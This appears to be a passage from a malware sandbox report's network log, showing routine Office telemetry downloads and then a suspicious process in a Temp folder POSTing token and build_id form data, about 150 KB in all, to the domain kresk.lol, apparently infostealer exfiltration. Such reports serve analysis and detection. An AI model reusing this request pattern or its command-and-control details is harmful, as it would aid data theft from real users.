41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:37 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	49851	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:37 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:38 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:38 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: c43eeb18-901e-008f-6ecb-4567a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111738Z-1746fd949bdjrnwqhC1EWRpg28000000012g000000008amx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:38 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	49852	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:38 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:38 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:38 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: dea1083a-301e-0051-14cb-4538bb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111738Z-1746fd949bd6ztf6hC1EWRvq2s00000000t0000000004gky x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:38 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	49853	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:38 UTC	191	OUT	GET /rules/rule90401v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:38 UTC	515	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:38 GMT Content-Type: text/xml Content-Length: 1250 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE4487AA" x-ms-request-id: baa0a071-001e-0082-5b91-3f5880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111738Z-1746fd949bd9x4mhhC1EWRb76n00000001500000000057fr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-04 11:17:38 UTC	1250	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	49854	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:38 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:38 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:38 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 5bdbb5de-801e-0067-47cb-45fe30000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111738Z-1746fd949bdnq7x2hC1EWRpxr000000000v0000000008sk5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:38 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	49855	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:38 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:38 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:38 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 55cb7248-101e-0017-4fd4-4547c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111738Z-1746fd949bdwt8wrhC1EWRu6rg000000019g00000000467k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:38 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49856	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:39 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----O8GDBAS0ZU37YUAS0ZM7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 153381 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:39 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 37 0d 0a 43 6f 6e 74 Data Ascii: ------O8GDBAS0ZU37YUAS0ZM7Content-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------O8GDBAS0ZU37YUAS0ZM7Content-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------O8GDBAS0ZU37YUAS0ZM7Cont
2024-12-04 11:17:39 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:39 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:39 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:39 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:39 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:39 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:39 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:39 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:39 UTC	6186	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 